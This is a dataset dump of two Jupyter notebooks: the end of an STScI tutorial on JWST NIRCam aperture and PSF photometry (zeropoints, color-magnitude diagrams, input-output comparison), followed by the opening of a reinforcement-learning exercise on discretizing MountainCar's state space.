"idx_ap, d2d_ap, _ = match_coordinates_sky(dict_aper[det][filt1]['stars for ap phot']['radec'],\n dict_aper[det][filt2]['stars for ap phot']['radec'])\n\nsep_constraint_ap = d2d_ap < max_sep\n\nmatched_apcorr_f115w = Table()\nmatched_apcorr_f200w = Table()\n\nmatched_apcorr_f115w = dict_aper[det][filt1]['stars for ap phot'][sep_constraint_ap]\nmatched_apcorr_f200w = dict_aper[det][filt2]['stars for ap phot'][idx_ap[sep_constraint_ap]]\n\ndict_aper[det][filt1]['stars for ap phot matched'] = matched_apcorr_f115w\ndict_aper[det][filt2]['stars for ap phot matched'] = matched_apcorr_f200w",
"_____no_output_____"
]
],
[
[
"### Load aperture correction table\n\n**Note**: these values are obtained from the study of the synthetic WebbPSF PSFs. They will be updated once we have in-flight measures.",
"_____no_output_____"
]
],
[
[
"if os.path.isfile('./aperture_correction_table.txt'):\n ap_tab = './aperture_correction_table.txt'\nelse:\n print(\"Downloading the aperture correction table\")\n\n boxlink_apcorr_table = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/aperture_correction_table.txt'\n boxfile_apcorr_table = './aperture_correction_table.txt'\n urllib.request.urlretrieve(boxlink_apcorr_table, boxfile_apcorr_table)\n ap_tab = './aperture_correction_table.txt'\n\naper_table = pd.read_csv(ap_tab, header=None, sep='\\s+', index_col=0,\n names=['filter', 'pupil', 'wave', 'r10', 'r20', 'r30', 'r40', 'r50', 'r60', 'r70', 'r80',\n 'r85', 'r90', 'sky_flux_px', 'apcorr10', 'apcorr20', 'apcorr30', 'apcorr40',\n 'apcorr50', 'apcorr60', 'apcorr70', 'apcorr80', 'apcorr85', 'apcorr90', 'sky_in',\n 'sky_out'], comment='#', skiprows=0, usecols=range(0, 26))\naper_table.head()",
"_____no_output_____"
]
],
[
[
"### Perform Aperture Photometry",
"_____no_output_____"
]
],
[
[
"def aperture_phot(det=det, filt='F070W'):\n\n radii = [aper_table.loc[filt]['r70']]\n\n ees = '70'.split()\n ee_radii = dict(zip(ees, radii))\n\n positions = np.transpose((dict_aper[det][filt]['stars for ap phot matched']['xcentroid'],\n dict_aper[det][filt]['stars for ap phot matched']['ycentroid']))\n\n image = fits.open(dict_images_combined[det][filt]['images'][0])\n data_sb = image[1].data\n imh = image[1].header\n data = data_sb / imh['PHOTMJSR']\n\n # sky from the aperture correction table:\n\n sky = {\"sky_in\": aper_table.loc[filt]['r80'], \"sky_out\": aper_table.loc[filt]['r85']}\n\n tic = time.perf_counter()\n\n table_aper = Table()\n\n for ee, radius in ee_radii.items():\n print(\"Performing aperture photometry for radius equivalent to EE = {0}% for filter {1}\".format(ee, filt))\n aperture = CircularAperture(positions, r=radius)\n annulus_aperture = CircularAnnulus(positions, r_in=sky[\"sky_in\"], r_out=sky[\"sky_out\"])\n annulus_mask = annulus_aperture.to_mask(method='center')\n\n bkg_median = []\n for mask in annulus_mask:\n annulus_data = mask.multiply(data)\n annulus_data_1d = annulus_data[mask.data > 0]\n _, median_sigclip, _ = sigma_clipped_stats(annulus_data_1d)\n bkg_median.append(median_sigclip)\n bkg_median = np.array(bkg_median)\n\n phot = aperture_photometry(data, aperture, method='exact')\n phot['annulus_median'] = bkg_median\n phot['aper_bkg'] = bkg_median * aperture.area\n phot['aper_sum_bkgsub'] = phot['aperture_sum'] - phot['aper_bkg']\n\n apcorr = [aper_table.loc[filt]['apcorr70']]\n\n phot['aper_sum_corrected'] = phot['aper_sum_bkgsub'] * apcorr\n\n phot['mag_corrected'] = -2.5 * np.log10(phot['aper_sum_corrected']) + dict_utils[filt]['VegaMAG zp modB']\n\n table_aper.add_column(phot['aperture_sum'], name='aper_sum_' + ee)\n table_aper.add_column(phot['annulus_median'], name='annulus_median_' + ee)\n table_aper.add_column(phot['aper_bkg'], name='aper_bkg_ee_' + ee)\n table_aper.add_column(phot['aper_sum_bkgsub'], name='aper_sum_bkgsub_' + ee)\n table_aper.add_column(phot['aper_sum_corrected'], name='aper_sum_corrected_' + filt) \n table_aper.add_column(phot['mag_corrected'], name='mag_corrected_' + filt)\n\n dict_aper[det][filt]['aperture phot table'] = table_aper\n\n toc = time.perf_counter()\n print(\"Time Elapsed:\", toc - tic)\n\n return",
"_____no_output_____"
],
[
"aperture_phot(det=det, filt=filt1)\naperture_phot(det=det, filt=filt2)",
"_____no_output_____"
]
],
[
[
"### Derive Zeropoints",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 8))\nplt.clf()\n\nax1 = plt.subplot(2, 1, 1)\n\nax1.set_xlabel(filt1, fontdict=font2)\nax1.set_ylabel('Zeropoint', fontdict=font2)\n\nidx_zp_1, d2d_zp_1, _ = match_coordinates_sky(dict_aper[det][filt1]['stars for ap phot matched']['radec'], radec_f115w_inst)\n\nsep_constraint_zp_1 = d2d_zp_1 < max_sep\n\nf115w_ap_matched = np.array(dict_aper[det][filt1]['aperture phot table']['mag_corrected_' + filt1][sep_constraint_zp_1])\nf115w_psf_matched = np.array(df_f115w[filt1 + '_inst'][idx_zp_1[sep_constraint_zp_1]])\n\ndiff_f115w = f115w_ap_matched - f115w_psf_matched\n_, zp_f115w, zp_sigma_f115w = sigma_clipped_stats(diff_f115w)\n\nxlim0 = -9\nxlim1 = -5\nylim0 = np.mean(diff_f115w) - 0.5\nylim1 = np.mean(diff_f115w) + 0.5\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.scatter(f115w_psf_matched, diff_f115w, s=50, color='k')\nax1.plot([xlim0, xlim1], [zp_f115w, zp_f115w], color='r', lw=5, ls='--')\nax1.text(xlim0 + 0.05, ylim1 - 0.15, filt1 + ' Zeropoint = %5.3f $\\pm$ %5.3f' % (zp_f115w, zp_sigma_f115w), color='k', fontdict=font2)\n \nax2 = plt.subplot(2, 1, 2)\n\nax2.set_xlabel(filt2, fontdict=font2)\nax2.set_ylabel('Zeropoint', fontdict=font2)\n\nidx_zp_2, d2d_zp_2, _ = match_coordinates_sky(dict_aper[det][filt2]['stars for ap phot matched']['radec'], radec_f200w_inst)\n\nsep_constraint_zp_2 = d2d_zp_2 < max_sep\n\nf200w_ap_matched = np.array(dict_aper[det][filt2]['aperture phot table']['mag_corrected_' + filt2][sep_constraint_zp_2])\nf200w_psf_matched = np.array(df_f200w[filt2 + '_inst'][idx_zp_2[sep_constraint_zp_2]])\n\ndiff_f200w = f200w_ap_matched - f200w_psf_matched\n_, zp_f200w, zp_sigma_f200w = sigma_clipped_stats(diff_f200w)\n\nxlim0 = -9\nxlim1 = -5\nylim0 = np.mean(diff_f200w) - 0.5\nylim1 = np.mean(diff_f200w) + 0.5\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(f200w_psf_matched, diff_f200w, s=50, color='k')\nax2.plot([xlim0, xlim1], [zp_f200w, zp_f200w], color='r', lw=5, ls='--')\nax2.text(xlim0 + 0.05, ylim1 - 0.15, filt2 + ' Zeropoint = %5.3f $\\pm$ %5.3f' % (zp_f200w, zp_sigma_f200w), color='k', fontdict=font2)\n \nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Import input photometry",
"_____no_output_____"
]
],
[
[
"if os.path.isfile('./pointsource.cat'):\n input_cat = './pointsource.cat'\n\nelse:\n \n print(\"Downloading input pointsource catalog\")\n\n boxlink_input_cat = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/pointsource.cat'\n boxfile_input_cat = './pointsource.cat'\n urllib.request.urlretrieve(boxlink_input_cat, boxfile_input_cat)\n input_cat = './pointsource.cat'\n\ncat = pd.read_csv(input_cat, header=None, sep='\\s+', names=['ra_in', 'dec_in', 'f070w_in', 'f115w_in',\n 'f200w_in', 'f277w_in', 'f356w_in', 'f444w_in'],\n comment='#', skiprows=7, usecols=range(0, 8))\n\ncat.head()",
"_____no_output_____"
]
],
[
[
"Extract from the input catalog the stars in the same region as the one analyzed",
"_____no_output_____"
]
],
[
[
"lim_ra_min = np.min(radec_f115w.ra)\nlim_ra_max = np.max(radec_f115w.ra)\nlim_dec_min = np.min(radec_f115w.dec)\nlim_dec_max = np.max(radec_f115w.dec)\n\ncat_sel = cat[(cat['ra_in'] > lim_ra_min) & (cat['ra_in'] < lim_ra_max) & (cat['dec_in'] > lim_dec_min)\n & (cat['dec_in'] < lim_dec_max)]",
"_____no_output_____"
]
],
[
[
"## Calibrated Color-Magnitude Diagram",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 14))\nplt.clf()\n\nax1 = plt.subplot(1, 2, 1)\n\nmag1_in = np.array(cat_sel['f115w_in'])\nmag2_in = np.array(cat_sel['f200w_in'])\ndiff_in = mag1_in - mag2_in\n\nxlim0 = -0.25\nxlim1 = 1.75\nylim0 = 25\nylim1 = 15 \nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.scatter(mag1_in - mag2_in, mag1_in, s=1, color='k')\n\nax1.set_xlabel(filt1 + ' - ' + filt2, fontdict=font2)\nax1.set_ylabel(filt1, fontdict=font2)\nax1.text(xlim0 + 0.15, 15.5, \"Input\", fontdict=font2)\n\nax2 = plt.subplot(1, 2, 2)\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nf115w = f115w_inst + zp_f115w \nf200w = f200w_inst + zp_f200w\n\nmaglim = np.arange(18, 25, 1)\nmags = []\nerrs_mag = []\nerrs_col = []\n\nfor i in np.arange(0, len(maglim) - 1, 1):\n\n mag = (maglim[i] + maglim[i + 1]) / 2\n err_mag1 = ef115w_inst[(f115w > maglim[i]) & (f115w < maglim[i + 1])]\n err_mag2 = ef200w_inst[(f115w > maglim[i]) & (f115w < maglim[i + 1])]\n err_mag = np.mean(err_mag1[i])\n err_temp = np.sqrt(err_mag1**2 + err_mag2**2)\n err_col = np.mean(err_temp[i])\n\n errs_mag.append(err_mag) \n errs_col.append(err_col)\n mags.append(mag)\n\ncol = [0] * (len(maglim) - 1)\n\nax2.errorbar(col, mags, yerr=errs_mag, xerr=errs_col, fmt='o', color='k')\n \nax2.scatter(f115w - f200w, f115w, s=1, color='k')\nax2.text(xlim0 + 0.15, 15.5, \"Output\", fontdict=font2)\n\nax2.set_xlabel(filt1 + ' - ' + filt2, fontdict=font2)\nax2.set_ylabel(filt1, fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Comparison between input and output photometry ",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 8))\nplt.clf()\n\nax1 = plt.subplot(2, 1, 1)\n\nax1.set_xlabel(filt1, fontdict=font2)\nax1.set_ylabel('$\\Delta$ Mag', fontdict=font2)\n\nradec_input = SkyCoord(cat_sel['ra_in'], cat_sel['dec_in'], unit='deg')\n\nidx_f115w_cfr, d2d_f115w_cfr, _ = match_coordinates_sky(radec_input, radec_f115w)\n\nsep_f115w_cfr = d2d_f115w_cfr < max_sep\n\nf115w_inp_cfr = np.array(cat_sel['f115w_in'][sep_f115w_cfr])\nf115w_psf_cfr = np.array(f115w[idx_f115w_cfr[sep_f115w_cfr]])\n\ndiff_f115w_cfr = f115w_inp_cfr - f115w_psf_cfr\n_, med_diff_f115w_cfr, sig_diff_f115w_cfr = sigma_clipped_stats(diff_f115w_cfr)\n\nxlim0 = 16\nxlim1 = 24.5\nylim0 = np.mean(diff_f115w_cfr) - 0.5\nylim1 = np.mean(diff_f115w_cfr) + 0.5\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.scatter(f115w_psf_cfr, diff_f115w_cfr, s=5, color='k')\nax1.plot([xlim0, xlim1], [0, 0], color='r', lw=5, ls='--')\nax1.text(xlim0 + 0.05, ylim1 - 0.15, filt1 + ' $\\Delta$ Mag = %5.3f $\\pm$ %5.3f'\n % (med_diff_f115w_cfr, sig_diff_f115w_cfr), color='k', fontdict=font2)\n\nax2 = plt.subplot(2, 1, 2)\n\nax2.set_xlabel(filt2, fontdict=font2)\nax2.set_ylabel('$\\Delta$ Mag', fontdict=font2)\n\nidx_f200w_cfr, d2d_f200w_cfr, _ = match_coordinates_sky(radec_input, radec_f200w)\n\nsep_f200w_cfr = d2d_f200w_cfr < max_sep\n\nf200w_inp_cfr = np.array(cat_sel['f200w_in'][sep_f200w_cfr])\nf200w_psf_cfr = np.array(f200w[idx_f200w_cfr[sep_f200w_cfr]])\n\ndiff_f200w_cfr = f200w_inp_cfr - f200w_psf_cfr\n_, med_diff_f200w_cfr, sig_diff_f200w_cfr = sigma_clipped_stats(diff_f200w_cfr)\n\nxlim0 = 16\nxlim1 = 24\nylim0 = np.mean(diff_f200w_cfr) - 0.5 \nylim1 = np.mean(diff_f200w_cfr) + 0.5\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(f200w_psf_cfr, diff_f200w_cfr, s=5, color='k')\nax2.plot([xlim0, xlim1], [0, 0], color='r', lw=5, ls='--')\nax2.text(xlim0 + 0.05, ylim1 - 0.15, filt2 + ' $\\Delta$ Mag = %5.3f $\\pm$ %5.3f'\n % (med_diff_f200w_cfr, sig_diff_f200w_cfr), color='k', fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 6))\n\nax1 = plt.subplot(1, 2, 1)\n\nxlim0 = -10\nxlim1 = 10\nylim0 = -10\nylim1 = 10\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.set_xlabel('$\\Delta$ RA (mas)', fontdict=font2)\nax1.set_ylabel('$\\Delta$ Dec (mas)', fontdict=font2)\nax1.set_title(filt1, fontdict=font2)\n\nra_f115w_inp_cfr = np.array(cat_sel['ra_in'][sep_f115w_cfr])\nra_f115w_psf_cfr = np.array(radec_f115w.ra[idx_f115w_cfr[sep_f115w_cfr]])\n\ndec_f115w_inp_cfr = np.array(cat_sel['dec_in'][sep_f115w_cfr])\ndec_f115w_psf_cfr = np.array(radec_f115w.dec[idx_f115w_cfr[sep_f115w_cfr]])\n\ndec_rad_f115w = np.radians(dec_f115w_psf_cfr)\n\ndiffra_f115w_cfr = ((((ra_f115w_inp_cfr - ra_f115w_psf_cfr) * np.cos(dec_rad_f115w)) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffra_f115w_cfr, sig_diffra_f115w_cfr = sigma_clipped_stats(diffra_f115w_cfr)\n\ndiffdec_f115w_cfr = (((dec_f115w_inp_cfr - dec_f115w_psf_cfr) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffdec_f115w_cfr, sig_diffdec_f115w_cfr = sigma_clipped_stats(diffdec_f115w_cfr)\n\nax1.scatter(diffra_f115w_cfr, diffdec_f115w_cfr, s=1, color='k')\nax1.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax1.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax1.text(xlim0 + 0.05, ylim1 - 1.50, ' $\\Delta$ RA (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffra_f115w_cfr, sig_diffra_f115w_cfr), color='k', fontdict=font2)\nax1.text(xlim0 + 0.05, ylim1 - 3.0, ' $\\Delta$ Dec (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffdec_f115w_cfr, sig_diffdec_f115w_cfr), color='k', fontdict=font2)\n\nax2 = plt.subplot(1, 2, 2)\n\nxlim0 = -10\nxlim1 = 10\nylim0 = -10\nylim1 = 10\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\nax2.set_title(filt2, fontdict=font2)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.set_xlabel('$\\Delta$ RA (mas)', fontdict=font2)\nax2.set_ylabel('$\\Delta$ Dec (mas)', fontdict=font2)\n\nra_f200w_inp_cfr = np.array(cat_sel['ra_in'][sep_f200w_cfr])\nra_f200w_psf_cfr = np.array(radec_f200w.ra[idx_f200w_cfr[sep_f200w_cfr]])\n\ndec_f200w_inp_cfr = np.array(cat_sel['dec_in'][sep_f200w_cfr])\ndec_f200w_psf_cfr = np.array(radec_f200w.dec[idx_f200w_cfr[sep_f200w_cfr]])\n\ndec_rad_f200w = np.radians(dec_f200w_psf_cfr)\n\ndiffra_f200w_cfr = ((((ra_f200w_inp_cfr - ra_f200w_psf_cfr) * np.cos(dec_rad_f200w)) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffra_f200w_cfr, sig_diffra_f200w_cfr = sigma_clipped_stats(diffra_f200w_cfr)\n\ndiffdec_f200w_cfr = (((dec_f200w_inp_cfr - dec_f200w_psf_cfr) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffdec_f200w_cfr, sig_diffdec_f200w_cfr = sigma_clipped_stats(diffdec_f200w_cfr)\n\nax2.scatter(diffra_f200w_cfr, diffdec_f200w_cfr, s=1, color='k')\nax2.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax2.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2.text(xlim0 + 0.05, ylim1 - 1.50, ' $\\Delta$ RA (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffra_f200w_cfr, sig_diffra_f200w_cfr), color='k', fontdict=font2)\nax2.text(xlim0 + 0.05, ylim1 - 3.0, ' $\\Delta$ Dec (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffdec_f200w_cfr, sig_diffdec_f200w_cfr), color='k', fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Final notes\n\nThis notebook provides a general overview on how to perform PSF photometry using the [PhotUtils](https://photutils.readthedocs.io/en/stable/) package. The choice of the different parameters adopted in all the reduction steps as well as the choice of the PSF model depend on the specific user science case. Moreover, a detailed analysis that allow to provide recommendations on how to set those parameters and outline the differences in the output photometry when different PSF models are adopted (single vs PSF grid, number of PSFs in the grid, etc.) will be possible only when real data will be available after the instrument commissioning. In this context, we note that one of the selected ERS program (ERS 1334 - The Resolved Stellar Populations Early Release Science Program) will provide a fundamental test benchmark to explore how the different choices outlined above will impact the quality of the PSF photometry in a crowded stellar region.",
"_____no_output_____"
],
[
"## About this Notebook\n\n**Author**: Matteo Correnti, JWST/NIRCam STScI Scientist II \\\n**Updated on**: 2021-01-15",
"_____no_output_____"
],
[
"[Top of Page](#top)\n\n<img style=\"float: right;\" src=\"https://raw.githubusercontent.com/spacetelescope/notebooks/master/assets/stsci_pri_combo_mark_horizonal_white_bkgd.png\" alt=\"Space Telescope Logo\" width=\"200px\"/>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e70756a0c3c2e5efa258dceade6b7e8838df1d22 | 29,263 | ipynb | Jupyter Notebook | discretization/Discretization.ipynb | rising-turtle/deep-reinforcement-learning | 6afbfd161df94fca2e18beb2386639ea26c3855b | [
"MIT"
] | null | null | null | discretization/Discretization.ipynb | rising-turtle/deep-reinforcement-learning | 6afbfd161df94fca2e18beb2386639ea26c3855b | [
"MIT"
] | null | null | null | discretization/Discretization.ipynb | rising-turtle/deep-reinforcement-learning | 6afbfd161df94fca2e18beb2386639ea26c3855b | [
"MIT"
] | null | null | null | 42.105036 | 2,046 | 0.579742 | [
[
[
"# Discretization\n\n---\n\nIn this notebook, you will deal with continuous state and action spaces by discretizing them. This will enable you to apply reinforcement learning algorithms that are only designed to work with discrete spaces.\n\n### 1. Import the Necessary Packages",
"_____no_output_____"
]
],
[
[
"import sys\nimport gym\nimport numpy as np\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Set plotting options\n%matplotlib inline\nplt.style.use('ggplot')\nnp.set_printoptions(precision=3, linewidth=120)",
"_____no_output_____"
]
],
[
[
"### 2. Specify the Environment, and Explore the State and Action Spaces\n\nWe'll use [OpenAI Gym](https://gym.openai.com/) environments to test and develop our algorithms. These simulate a variety of classic as well as contemporary reinforcement learning tasks. Let's use an environment that has a continuous state space, but a discrete action space.",
"_____no_output_____"
]
],
[
[
"# Create an environment and set random seed\nenv = gym.make('MountainCar-v0')\nenv.seed(505);",
"_____no_output_____"
]
],
[
[
"Run the next code cell to watch a random agent.",
"_____no_output_____"
]
],
[
[
"state = env.reset()\nscore = 0\nfor t in range(200):\n action = env.action_space.sample()\n env.render()\n state, reward, done, _ = env.step(action)\n score += reward\n if done:\n break \nprint('Final score:', score)\nenv.close()",
"_____no_output_____"
]
],
[
[
"In this notebook, you will train an agent to perform much better! For now, we can explore the state and action spaces, as well as sample them.",
"_____no_output_____"
]
],
[
[
"# Explore state (observation) space\nprint(\"State space:\", env.observation_space)\nprint(\"- low:\", env.observation_space.low)\nprint(\"- high:\", env.observation_space.high)",
"_____no_output_____"
],
[
"# Generate some samples from the state space \nprint(\"State space samples:\")\nprint(np.array([env.observation_space.sample() for i in range(10)]))",
"_____no_output_____"
],
[
"# Explore the action space\nprint(\"Action space:\", env.action_space)\n\n# Generate some samples from the action space\nprint(\"Action space samples:\")\nprint(np.array([env.action_space.sample() for i in range(10)]))",
"_____no_output_____"
]
],
[
[
"### 3. Discretize the State Space with a Uniform Grid\n\nWe will discretize the space using a uniformly-spaced grid. Implement the following function to create such a grid, given the lower bounds (`low`), upper bounds (`high`), and number of desired `bins` along each dimension. It should return the split points for each dimension, which will be 1 less than the number of bins.\n\nFor instance, if `low = [-1.0, -5.0]`, `high = [1.0, 5.0]`, and `bins = (10, 10)`, then your function should return the following list of 2 NumPy arrays:\n\n```\n[array([-0.8, -0.6, -0.4, -0.2, 0.0, 0.2, 0.4, 0.6, 0.8]),\n array([-4.0, -3.0, -2.0, -1.0, 0.0, 1.0, 2.0, 3.0, 4.0])]\n```\n\nNote that the ends of `low` and `high` are **not** included in these split points. It is assumed that any value below the lowest split point maps to index `0` and any value above the highest split point maps to index `n-1`, where `n` is the number of bins along that dimension.",
"_____no_output_____"
]
],
[
[
"def create_uniform_grid(low, high, bins=(10, 10)):\n \"\"\"Define a uniformly-spaced grid that can be used to discretize a space.\n \n Parameters\n ----------\n low : array_like\n Lower bounds for each dimension of the continuous space.\n high : array_like\n Upper bounds for each dimension of the continuous space.\n bins : tuple\n Number of bins along each corresponding dimension.\n \n Returns\n -------\n grid : list of array_like\n A list of arrays containing split points for each dimension.\n \"\"\"\n # TODO: Implement this\n space = (np.array(high) - np.array(low))/np.array(bins)\n return [np.array([ (l+b*s) for i in range(1,b)] for (l, b, s) in zip(low, bins, space))]\n\n\nlow = [-1.0, -5.0]\nhigh = [1.0, 5.0]\ncreate_uniform_grid(low, high) # [test]",
"_____no_output_____"
]
],
[
[
"Now write a function that can convert samples from a continuous space into its equivalent discretized representation, given a grid like the one you created above. You can use the [`numpy.digitize()`](https://docs.scipy.org/doc/numpy-1.9.3/reference/generated/numpy.digitize.html) function for this purpose.\n\nAssume the grid is a list of NumPy arrays containing the following split points:\n```\n[array([-0.8, -0.6, -0.4, -0.2, 0.0, 0.2, 0.4, 0.6, 0.8]),\n array([-4.0, -3.0, -2.0, -1.0, 0.0, 1.0, 2.0, 3.0, 4.0])]\n```\n\nHere are some potential samples and their corresponding discretized representations:\n```\n[-1.0 , -5.0] => [0, 0]\n[-0.81, -4.1] => [0, 0]\n[-0.8 , -4.0] => [1, 1]\n[-0.5 , 0.0] => [2, 5]\n[ 0.2 , -1.9] => [6, 3]\n[ 0.8 , 4.0] => [9, 9]\n[ 0.81, 4.1] => [9, 9]\n[ 1.0 , 5.0] => [9, 9]\n```\n\n**Note**: There may be one-off differences in binning due to floating-point inaccuracies when samples are close to grid boundaries, but that is alright.",
"_____no_output_____"
]
],
[
[
"def discretize(sample, grid):\n \"\"\"Discretize a sample as per given grid.\n \n Parameters\n ----------\n sample : array_like\n A single sample from the (original) continuous space.\n grid : list of array_like\n A list of arrays containing split points for each dimension.\n \n Returns\n -------\n discretized_sample : array_like\n A sequence of integers with the same number of dimensions as sample.\n \"\"\"\n # TODO: Implement this\n return list( int(np.digitize(s, g)) for (s,g) in zip(sample, grid))\n\n\n# Test with a simple grid and some samples\ngrid = create_uniform_grid([-1.0, -5.0], [1.0, 5.0])\nsamples = np.array(\n [[-1.0 , -5.0],\n [-0.81, -4.1],\n [-0.8 , -4.0],\n [-0.5 , 0.0],\n [ 0.2 , -1.9],\n [ 0.8 , 4.0],\n [ 0.81, 4.1],\n [ 1.0 , 5.0]])\ndiscretized_samples = np.array([discretize(sample, grid) for sample in samples])\nprint(\"\\nSamples:\", repr(samples), sep=\"\\n\")\nprint(\"\\nDiscretized samples:\", repr(discretized_samples), sep=\"\\n\")",
"_____no_output_____"
]
],
[
[
"### 4. Visualization\n\nIt might be helpful to visualize the original and discretized samples to get a sense of how much error you are introducing.",
"_____no_output_____"
]
],
[
[
